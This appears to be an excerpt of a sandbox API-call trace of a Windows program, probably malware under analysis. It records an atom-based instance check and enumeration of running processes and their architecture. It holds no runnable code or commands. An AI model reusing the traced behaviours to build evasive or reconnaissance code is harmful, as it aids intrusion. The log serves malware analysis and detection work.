	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.613] GetLastError () returned 0x5
	[0126.614] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.614] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.614] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] GetLastError () returned 0x5
	[0126.614] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.615] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetLastError () returned 0x5
	[0126.616] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.617] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.617] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.617] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.617] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.617] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.617] CloseHandle (hObject=0x2dc) returned 1
	[0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.618] CloseHandle (hObject=0x2dc) returned 1
	[0126.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.618] CloseHandle (hObject=0x2dc) returned 1
	[0126.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.618] CloseHandle (hObject=0x2dc) returned 1
	[0126.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.619] CloseHandle (hObject=0x2dc) returned 1
	[0126.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.619] CloseHandle (hObject=0x2dc) returned 1
	[0126.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.655] CloseHandle (hObject=0x2dc) returned 1
	[0126.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.656] CloseHandle (hObject=0x2dc) returned 1
	[0126.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.657] CloseHandle (hObject=0x2dc) returned 1
	[0126.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.657] CloseHandle (hObject=0x2dc) returned 1
	[0126.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.657] CloseHandle (hObject=0x2dc) returned 1
	[0126.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.658] CloseHandle (hObject=0x2dc) returned 1
	[0126.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.658] CloseHandle (hObject=0x2dc) returned 1
	[0126.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.659] CloseHandle (hObject=0x2dc) returned 1
	[0126.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.659] CloseHandle (hObject=0x2dc) returned 1
	[0126.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.660] CloseHandle (hObject=0x2dc) returned 1
	[0126.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.660] CloseHandle (hObject=0x2dc) returned 1
	[0126.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.660] CloseHandle (hObject=0x2dc) returned 1
	[0126.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.661] CloseHandle (hObject=0x2dc) returned 1
	[0126.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.661] CloseHandle (hObject=0x2dc) returned 1
	[0126.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.661] CloseHandle (hObject=0x2dc) returned 1
	[0126.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.662] CloseHandle (hObject=0x2dc) returned 1
	[0126.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.662] CloseHandle (hObject=0x2dc) returned 1
	[0126.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.662] CloseHandle (hObject=0x2dc) returned 1
	[0126.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.663] CloseHandle (hObject=0x2dc) returned 1
	[0126.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.663] CloseHandle (hObject=0x2dc) returned 1
	[0126.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.663] CloseHandle (hObject=0x2dc) returned 1
	[0126.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.664] CloseHandle (hObject=0x2dc) returned 1
	[0126.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.664] CloseHandle (hObject=0x2dc) returned 1
	[0126.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.665] CloseHandle (hObject=0x2dc) returned 1
	[0126.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.665] CloseHandle (hObject=0x2dc) returned 1
	[0126.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.666] CloseHandle (hObject=0x2dc) returned 1
